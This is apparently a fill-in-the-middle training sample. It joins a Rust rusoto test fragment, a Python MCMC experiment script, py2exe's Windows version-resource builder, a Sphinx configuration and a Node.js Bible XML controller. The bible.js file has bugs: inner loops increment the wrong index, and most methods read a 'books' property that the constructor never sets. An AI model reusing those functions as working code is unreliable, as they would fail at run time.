MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeEventsMessage::default(); let result = client.describe_events(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_list_available_solution_stacks() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-list-available-solution-stacks.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let result = client.list_available_solution_stacks(); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_retrieve_environment_info() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-retrieve-environment-info.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = RetrieveEnvironmentInfoMessage::default(); let result = client.retrieve_environment_info(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_terminate_environment() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-terminate-environment.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = TerminateEnvironmentMessage::default(); let result = client.terminate_environment(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_update_application_version() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-update-application-version.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = UpdateApplicationVersionMessage::default(); let result = client.update_application_version(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_update_application() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-update-application.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = UpdateApplicationMessage::default(); let result = client.update_application(&request); assert!(result.is_ok(), "parse error: {:?}", result); } }<|fim▁end|>
<|file_name|>glass_ard_ground_truth.py<|end_file_name|><|fim▁begin|>""" This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. Written (W) 2013 Heiko Strathmann """ from kameleon_mcmc.distribution.Gaussian import Gaussian from kameleon_mcmc.experiments.SingleChainExperiment import SingleChainExperiment from kameleon_mcmc.gp.GPData import GPData from kameleon_mcmc.gp.mcmc.PseudoMarginalHyperparameterDistribution import PseudoMarginalHyperparameterDistribution from kameleon_mcmc.kernel.GaussianKernel import GaussianKernel from kameleon_mcmc.mcmc.MCMCChain import MCMCChain from kameleon_mcmc.mcmc.MCMCParams import MCMCParams from kameleon_mcmc.mcmc.output.PlottingOutput import PlottingOutput from kameleon_mcmc.mcmc.output.StatisticsOutput import StatisticsOutput from kameleon_mcmc.mcmc.samplers.AdaptiveMetropolisLearnScale import AdaptiveMetropolisLearnScale from kameleon_mcmc.mcmc.samplers.KameleonWindowLearnScale import KameleonWindowLearnScale from kameleon_mcmc.mcmc.samplers.StandardMetropolis import StandardMetropolis from numpy.lib.twodim_base import eye from numpy.linalg.linalg import cholesky from numpy.ma.core import mean, ones, shape, asarray, zeros from numpy.ma.extras import cov from numpy.random import permutation, seed from scipy.linalg.basic import solve_triangular from kameleon_mcmc.experiments.ClusterTools import ClusterTools import os import sys if __name__ == '__main__': if len(sys.argv) != 3: print "usage:", str(sys.argv[0]).split(os.sep)[-1], "<experiment_dir_base> <number_of_experiments>" print "example:" print "python " + str(sys.argv[0]).split(os.sep)[-1] + " /nfs/nhome/live/ucabhst/kameleon_experiments/ 3" exit() experiment_dir_base = str(sys.argv[1]) n = int(str(sys.argv[2])) # loop over parameters here experiment_dir = experiment_dir_base + str(os.path.abspath(sys.argv[0])).split(os.sep)[-1].split(".")[0] + os.sep print "running experiments", n, "times at base", experiment_dir # load data data,labels=GPData.get_glass_data() # normalise and whiten dataset data-=mean(data, 0) L=cholesky(cov(data.T)) data=solve_triangular(L, data.T, lower=True).T dim=shape(data)[1] # prior on theta and posterior target estimate theta_prior=Gaussian(mu=0*ones(dim), Sigma=eye(dim)*5) distribution=PseudoMarginalHyperparameterDistribution(data, labels, \ n_importance=100, prior=theta_prior, \ ridge=1e-3) sigma = 23.0 print "using sigma", sigma kernel = GaussianKernel(sigma=sigma) for i in range(n): mcmc_samplers = []<|fim▁hole|> burnin=50000 num_iterations=500000 #mcmc_samplers.append(KameleonWindowLearnScale(distribution, kernel, stop_adapt=burnin)) #mean_est = zeros(distribution.dimension, dtype="float64") #cov_est = 1.0 * eye(distribution.dimension) #cov_est[0, 0] = distribution.V #mcmc_samplers.append(AdaptiveMetropolisLearnScale(distribution, mean_est=mean_est, cov_est=cov_est)) #mcmc_samplers.append(AdaptiveMetropolis(distribution, mean_est=mean_est, cov_est=cov_est)) mcmc_samplers.append(StandardMetropolis(distribution)) start = zeros(distribution.dimension, dtype="float64") mcmc_params = MCMCParams(start=start, num_iterations=num_iterations, burnin=burnin) mcmc_chains = [MCMCChain(mcmc_sampler, mcmc_params) for mcmc_sampler in mcmc_samplers] for mcmc_chain in mcmc_chains: mcmc_chain.append_mcmc_output(StatisticsOutput()) experiments = [SingleChainExperiment(mcmc_chain, experiment_dir) for mcmc_chain in mcmc_chains] for experiment in experiments: ClusterTools.submit_experiment(experiment)<|fim▁end|>
<|file_name|>VersionInfo.py<|end_file_name|><|fim▁begin|># -*- coding: latin-1 -*- ## ## Copyright (c) 2000, 2001, 2002, 2003 Thomas Heller ## ## Permission is hereby granted, free of charge, to any person obtaining ## a copy of this software and associated documentation files (the ## "Software"), to deal in the Software without restriction, including ## without limitation the rights to use, copy, modify, merge, publish, ## distribute, sublicense, and/or sell copies of the Software, and to ## permit persons to whom the Software is furnished to do so, subject to ## the following conditions: ## ## The above copyright notice and this permission notice shall be ## included in all copies or substantial portions of the Software. ## ## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, ## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF ## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND ## NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE ## LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION ## OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION ## WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ## # # $Id: VersionInfo.py 392 2004-03-12 17:00:21Z theller $ # # $Log$ # Revision 1.3 2004/01/16 10:45:31 theller # Move py2exe from the sandbox directory up to the root dir. # # Revision 1.3 2003/12/29 13:44:57 theller # Adapt for Python 2.3. # # Revision 1.2 2003/09/18 20:19:57 theller # Remove a 2.3 warning, but mostly this checkin is to test the brand new # py2exe-checkins mailing list. # # Revision 1.1 2003/08/29 12:30:52 mhammond # New py2exe now uses the old resource functions :) # # Revision 1.1 2002/01/29 09:30:55 theller # version 0.3.0 # # Revision 1.2 2002/01/14 19:08:05 theller # Better (?) Unicode handling. # # Revision 1.1 2002/01/07 10:30:32 theller # Create a version resource. # # import struct VOS_NT_WINDOWS32 = 0x00040004 VFT_APP = 0x00000001 RT_VERSION = 16 class VersionError(Exception): pass def w32_uc(text): """convert a string into unicode, then encode it into UTF-16 little endian, ready to use for win32 apis""" if type(text) is str: return unicode(text, "unicode-escape").encode("utf-16-le") return unicode(text).encode("utf-16-le") class VS_FIXEDFILEINFO: dwSignature = 0xFEEF04BDL dwStrucVersion = 0x00010000 dwFileVersionMS = 0x00010000 dwFileVersionLS = 0x00000001 dwProductVersionMS = 0x00010000 dwProductVersionLS = 0x00000001 dwFileFlagsMask = 0x3F dwFileFlags = 0 dwFileOS = VOS_NT_WINDOWS32 dwFileType = VFT_APP dwFileSubtype = 0 dwFileDateMS = 0 dwFileDateLS = 0 fmt = "13L" def __init__(self, version): import string version = string.replace(version, ",", ".") fields = string.split(version + '.0.0.0.0', ".")[:4] fields = map(string.strip, fields) try: self.dwFileVersionMS = int(fields[0]) * 65536 + int(fields[1]) self.dwFileVersionLS = int(fields[2]) * 65536 + int(fields[3]) except ValueError: raise VersionError, "could not parse version number '%s'" % version def __str__(self): return struct.pack(self.fmt, self.dwSignature, self.dwStrucVersion, self.dwFileVersionMS, self.dwFileVersionLS, self.dwProductVersionMS, self.dwProductVersionLS, self.dwFileFlagsMask, self.dwFileFlags, self.dwFileOS, self.dwFileType, self.dwFileSubtype, self.dwFileDateMS, self.dwFileDateLS) <|fim▁hole|>def align(data): pad = - len(data) % 4 return data + '\000' * pad class VS_STRUCT: items = () def __str__(self): szKey = w32_uc(self.name) ulen = len(szKey)+2 value = self.get_value() data = struct.pack("h%ss0i" % ulen, self.wType, szKey) + value data = align(data) for item in self.items: data = data + str(item) wLength = len(data) + 4 # 4 bytes for wLength and wValueLength wValueLength = len(value) return self.pack("hh", wLength, wValueLength, data) def pack(self, fmt, len, vlen, data): return struct.pack(fmt, len, vlen) + data def get_value(self): return "" class String(VS_STRUCT): wType = 1 items = () def __init__(self, (name, value)): self.name = name if value: self.value = value + '\000' # strings must be zero terminated else: self.value = value def pack(self, fmt, len, vlen, data): # ValueLength is measured in WORDS, not in BYTES! return struct.pack(fmt, len, vlen/2) + data def get_value(self): return w32_uc(self.value) class StringTable(VS_STRUCT): wType = 1 def __init__(self, name, strings): self.name = name self.items = map(String, strings) class StringFileInfo(VS_STRUCT): wType = 1 name = "StringFileInfo" def __init__(self, name, strings): self.items = [StringTable(name, strings)] class Var(VS_STRUCT): # MSDN says: # If you use the Var structure to list the languages your # application or DLL supports instead of using multiple version # resources, use the Value member to contain an array of DWORD # values indicating the language and code page combinations # supported by this file. The low-order word of each DWORD must # contain a Microsoft language identifier, and the high-order word # must contain the IBM® code page number. Either high-order or # low-order word can be zero, indicating that the file is language # or code page independent. If the Var structure is omitted, the # file will be interpreted as both language and code page # independent. wType = 0 name = "Translation" def __init__(self, value): self.value = value def get_value(self): return struct.pack("l", self.value) class VarFileInfo(VS_STRUCT): wType = 1 name = "VarFileInfo" def __init__(self, *names): self.items = map(Var, names) def get_value(self): return "" class VS_VERSIONINFO(VS_STRUCT): wType = 0 # 0: binary data, 1: text data name = "VS_VERSION_INFO" def __init__(self, version, items): self.value = VS_FIXEDFILEINFO(version) self.items = items def get_value(self): return str(self.value) class Version(object): def __init__(self, version, comments = None, company_name = None, file_description = None, internal_name = None, legal_copyright = None, legal_trademarks = None, original_filename = None, private_build = None, product_name = None, product_version = None, special_build = None): self.version = version strings = [] if comments is not None: strings.append(("Comments", comments)) if company_name is not None: strings.append(("CompanyName", company_name)) if file_description is not None: strings.append(("FileDescription", file_description)) strings.append(("FileVersion", version)) if internal_name is not None: strings.append(("InternalName", internal_name)) if legal_copyright is not None: strings.append(("LegalCopyright", legal_copyright)) if legal_trademarks is not None: strings.append(("LegalTrademarks", legal_trademarks)) if original_filename is not None: strings.append(("OriginalFilename", original_filename)) if private_build is not None: strings.append(("PrivateBuild", private_build)) if product_name is not None: strings.append(("ProductName", product_name)) strings.append(("ProductVersion", product_version or version)) if special_build is not None: strings.append(("SpecialBuild", special_build)) self.strings = strings def resource_bytes(self): vs = VS_VERSIONINFO(self.version, [StringFileInfo("040904B0", self.strings), VarFileInfo(0x04B00409)]) return str(vs) def test(): import sys sys.path.append("c:/tmp") from hexdump import hexdump version = Version("1, 0, 0, 1", comments = "ümläut comments", company_name = "No Company", file_description = "silly application", internal_name = "silly", legal_copyright = u"Copyright © 2003", ## legal_trademark = "", original_filename = "silly.exe", private_build = "test build", product_name = "silly product", product_version = None, ## special_build = "" ) hexdump(version.resource_bytes()) if __name__ == '__main__': import sys sys.path.append("d:/nbalt/tmp") from hexdump import hexdump test()<|fim▁end|>
<|file_name|>conf.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Qcloud COS SDK for Python 3 documentation build configuration file, created by # cookiecutter pipproject # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os import sphinx_rtd_theme # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath('../..')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = 'Qcloud COS SDK for Python 3' copyright = '2016, Dan Su' author = 'Dan Su' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '0.1.0' # The full version, including alpha/beta/rc tags. release = '0.1.0' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = [] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. #keep_warnings = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. # "<project> v<release> documentation" by default. #html_title = 'Qcloud COS SDK for Python 3 v0.1.0' # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (relative to this directory) to use as a favicon of # the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. #html_extra_path = [] # If not None, a 'Last updated on:' timestamp is inserted at every page # bottom, using the given strftime format. # The empty string is equivalent to '%b %d, %Y'. #html_last_updated_fmt = None # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh' #html_search_language = 'en' # A dictionary with options for the search language support, empty by default. # 'ja' uses this config value. # 'zh' user can custom change `jieba` dictionary path. #html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. #html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = 'Qcloud COS SDK for Python 3doc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', # Latex figure (float) alignment #'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'Qcloud COS SDK for Python 3.tex', 'Qcloud COS SDK for Python 3 Documentation', 'Dan Su', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'Qcloud COS SDK for Python 3', 'Qcloud COS SDK for Python 3 Documentation', [author], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'Qcloud COS SDK for Python 3', 'Qcloud COS SDK for Python 3 Documentation', author, 'Qcloud COS SDK for Python 3', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False<|fim▁hole|>html_theme = "sphinx_rtd_theme" html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]<|fim▁end|>
<|file_name|>bible.js<|end_file_name|><|fim▁begin|>/** * @overview Controller for a single Bible * @module bible * @author Dominik Sigmund * @version 0.1 * @description Creates an Object. Has specific methods to show and manipulate data * @memberof myVerses * @requires module:fs * @requires module:xml2js */ var fs = require('fs') var xml2js = require('xml2js') /** Creates a instance of class Bibles * @class Bibles * @param {string} xmlbible - Path to a XML-Bible from Zefania. * @param {function} callback - Called after all is done * @returns {object} The Working User Object * */ function Bible (xmlbible, callback) { var self = this self.bible = [] self.information = {} self.xmlbible = xmlbible var parser = new xml2js.Parser({ explicitArray: false, trim: true }) fs.readFile(xmlbible, function (err, data) { if (err) { return callback(err) } else { parser.parseString(data, function (err, result) { if (err) { return callback(err) } else { self.information = result.XMLBIBLE.INFORMATION result.XMLBIBLE.BIBLEBOOK.forEach(function (xbook) { var book = { name: (typeof xbook['$'].bname !== 'undefined') ? xbook['$'].bname : '', number: xbook['$'].bnumber, short: (typeof xbook['$'].bsname !== 'undefined') ? xbook['$'].bsname : '', chapters: [] } if (xbook.CHAPTER.length > 0) { xbook.CHAPTER.forEach(function (xchapter) { var chapter = { number: xchapter['$'].cnumber, verses: [] } if (xchapter.VERS.length > 0) { xchapter.VERS.forEach(function (xverse) { var verse = { number: xverse['$'].vnumber, text: xverse['_'] } chapter.verses.push(verse) }) } else { var xverse = xchapter.VERS var verse = { number: xverse['$'].vnumber, text: xverse['_'] } chapter.verses.push(verse) } book.chapters.push(chapter) }) } else { var xchapter = xbook.CHAPTER var chapter = { number: xchapter['$'].cnumber, verses: [] } if (xchapter.VERS.length > 0) { xchapter.VERS.forEach(function (xverse) { var verse = { number: xverse['$'].vnumber, text: xverse['_'] } chapter.verses.push(verse) }) } else { var xverse = xchapter.VERS var verse = { number: xverse['$'].vnumber, text: xverse['_'] } chapter.verses.push(verse) } book.chapters.push(chapter) } self.bible.push(book) }) } }) } }) } // ------------------------------------------------------------------------------------------------------------- /** Return the Information Object * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getInformation = function (callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else {<|fim▁hole|> callback(null, this.information) } } /** Sync Return the Information Object * @returns {object} - An information object * */ Bible.prototype.getInformationSync = function () { return this.information } // ------------------------------------------------------------------------------------------------------------- /** Return the Bible Object * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getBible = function (callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { callback(null, this.bible) } } /** Sync Return the Bible Object * @returns {object} - A bible object * */ Bible.prototype.getBibleSync = function () { return this.bible } // ------------------------------------------------------------------------------------------------------------- /** Return All books in the bible * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getBooks = function (callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { if (this.bible.books.length < 1) { callback({status: 404, message: 'No Books in Bible'}) } else { callback(null, this.bible.books) } } } /** Sync Return All books in the bible * @returns {array} - An array of books * */ Bible.prototype.getBooksSync = function () { return this.bible.books } // ------------------------------------------------------------------------------------------------------------- /** Return the Book Object * @param {string} number - The number of the Book * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getBook = function (number, callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { var book = returnBook(this.bible, number) if (book === null) { callback({status: 404, message: 'No Book with Number ' + number + ' found'}) } else { callback(null, book) } } } /** Sync Return the Book Object * @param {string} id - The ID of the Book * @returns {object} - A Book object * */ Bible.prototype.getBookSync = function (number) { return returnBook(this.bible, number) } /** Return the Book Object * @param {object} bible - bible-object * @param {string} number - The number of the Book * @returns {object} - A Book object * */ function returnBook (bible, number) { for (var i = 0; i < bible.books.length; i++) { if (bible.books[i].number === number) { return bible.books[i] } } return null } // ------------------------------------------------------------------------------------------------------------- /** Return All chapters in the book * @param {string} bookid - The ID of the Book * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getChapters = function (bookid, callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { var chapters = returnChapters(this.bible, bookid) if (chapters.length < 1) { callback({status: 404, message: 'No Chapters in Book with Number ' + bookid + ' found'}) } else { callback(null, chapters) } } } /** Sync Return All chapters in the book * @param {string} bookid - The ID of the Book * @returns {array} - An array of chapters * */ Bible.prototype.getChaptersSync = function (bookid) { return returnChapters(this.bible, bookid) } /** Return All chapters in the book * @param {object} bible - bible-object * @param {string} bookid - The number of the Book * @returns {array} - An array of chapters * */ function returnChapters (bible, number) { for (var i = 0; i < bible.books.length; i++) { if (bible.books[i].number === number) { return bible.books[i].chapters } } return null } // ------------------------------------------------------------------------------------------------------------- /** Return the Chapter Object * @param {string} id - The ID of the Book * @param {string} nr - The Nr of the Chapter * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getChapter = function (bookid, nr, callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { var chapter = returnChapter(this.bible, bookid, nr) if (chapter === null) { callback({status: 404, message: 'No Chapter with Number ' + nr + 'found in Book with Number ' + bookid + ' found'}) } else { callback(null, chapter) } } } /** Sync Return the Chapter Object * @param {string} id - The ID of the Book * @param {string} nr - The Nr of the Chapter * @returns {object} - A Chapter object * */ Bible.prototype.getChapterSync = function (bookid, nr) { return returnChapter(this.bible, bookid, nr) } /** Return the Chapter Object * @param {object} bible - bible-object * @param {string} bookid - The ID of the Book * @param {string} chapterid - The Nr of the Chapter * @returns {object} - A Chapter object * */ function returnChapter (bible, bookid, chapterid) { for (var i = 0; i < bible.books.length; i++) { if (bible.books[i].number === bookid) { for (var j = 0; j < bible.books[i].chapters.length; i++) { if (bible.books[i].chapters[j].number === chapterid) { return bible.books[i].chapters[j] } } } } return null } // ------------------------------------------------------------------------------------------------------------- /** Return All Verses in the chapter * @param {string} bookid - The ID of the Book * @param {string} nr - The Nr of the Chapter * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getVerses = function (bookid, chapter, callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { var verses = returnVerses(this.bible, bookid, chapter) if (verses.length < 1) { callback({status: 404, message: 'No Verses in Chapter with Number ' + chapter + ' in Book with Number ' + bookid + ' found'}) } else { callback(null, verses) } } } /** Sync Return All Verses in the chapter * @param {string} bookid - The ID of the Book * @param {string} nr - The Nr of the Chapter * @returns {array} - An array of verses * */ Bible.prototype.getVersesSync = function (bookid, chapter) { return returnVerses(this.bible, bookid, chapter) } /** Return All Verses in the chapter * @param {object} bible - bible-object * @param {string} bookid - The ID of the Book * @param {string} chapterid - The Nr of the Chapter * @returns {array} - An array of verses * */ function returnVerses (bible, bookid, chapterid) { for (var i = 0; i < bible.books.length; i++) { if (bible.books[i].number === bookid) { for (var j = 0; j < bible.books[i].chapters.length; i++) { if (bible.books[i].chapters[j].number === chapterid) { return bible.books[i].chapters[j].verses } } } } return null } // ------------------------------------------------------------------------------------------------------------- /** Return the Verse Object * @param {string} id - The ID of the Book * @param {string} chapter - The Nr of the Chapter * @param {string} nr - The Nr of the Verse * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getVerse = function (bookid, chapter, nr, callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { var verse = returnVerse(this.bible, bookid, chapter, nr) if (verse === null) { callback({status: 404, message: 'No Verse with Number ' + nr + ' in Chapter with Number ' + chapter + 'found in Book with Number ' + bookid + ' found'}) } else { callback(null, verse) } } } /** Sync Return the Verse Object * @param {string} id - The ID of the Book * @param {string} chapter - The Nr of the Chapter * @param {string} nr - The Nr of the Verse * @returns {object} - A Verse object * */ Bible.prototype.getVerseSync = function (bookid, chapter, nr) { return returnVerse(this.bible, bookid, chapter, nr) } /** Sync Return the Verse Object * @param {object} bible - bible-object * @param {string} id - The ID of the Book * @param {string} chapter - The Nr of the Chapter * @param {string} nr - The Nr of the Verse * @returns {object} - A Verse object * */ function returnVerse (bible, bookid, chapterid, verseid) { for (var i = 0; i < bible.books.length; i++) { if (bible.books[i].number === bookid) { for (var j = 0; j < bible.books[i].chapters.length; i++) { if (bible.books[i].chapters[j].number === chapterid) { for (var k = 0; k < bible.books[i].chapters[j].verses.length; k++) { if (bible.books[i].chapters[j].verses[k].number === verseid) { return bible.books[i].chapters[j].verses[k] } } } } } } return null } // ------------------------------------------------------------------------------------------------------------- /** Return the Verse Object * @param {string} code - The Code of the Verse BOOK-CHAPTER-VERSE * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getVerseByCode = function (code, callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { var verse = returnVerseByCode(this.bible, code) if (verse === null) { callback({status: 404, message: 'No Verse with Code ' + code + ' found'}) } else { callback(null, verse) } } } /** Sync Return the Verse Object * @param {string} code - The Code of the Verse BOOKID-CHAPTER-VERSE * @returns {object} - A Verse object * */ Bible.prototype.getVerseByCodeSync = function (code) { return returnVerseByCode(this.bible, code) } /** Return the Verse Object * @param {object} bible - bible-object * @param {string} code - The Code of the Verse BOOKID-CHAPTER-VERSE * @returns {object} - A Verse object * */ function returnVerseByCode (bible, code) { var tmp = code.split('-') return returnVerse(bible, tmp[0], tmp[1], tmp[2]) } // ------------------------------------------------------------------------------------------------------------- /** Return All Verses in the bible matching the text * @param {string} text - The Query to search for * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.search = function (text, callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { var verses = returnSearch(this.bible, text) if (verses.length < 1) { callback({status: 404, message: 'No Verse with Query ' + text + ' found'}) } else { callback(null, verses) } } } /** Sync Return All Verses in the bible matching the text * @param {string} text - The Query to search for * @returns {array} - An array of verses * */ Bible.prototype.searchSync = function (text) { return returnSearch(this.bible, text) } /** Return All Verses in the bible matching the text * @param {object} bible - bible-object * @param {string} text - The Query to search for * @returns {array} - An array of verses * */ function returnSearch (bible, query) { var verses = [] for (var i = 0; i < bible.books.length; i++) { for (var j = 0; j < bible.books[i].chapters.length; i++) { for (var k = 0; k < bible.books[i].chapters[j].verses.length; k++) { if (bible.books[i].chapters[j].verses[k].text.includes(query)) { verses.push(bible.books[i].chapters[j].verses[k]) } } } } return verses } // ------------------------------------------------------------------------------------------------------------- module.exports = Bible<|fim▁end|>
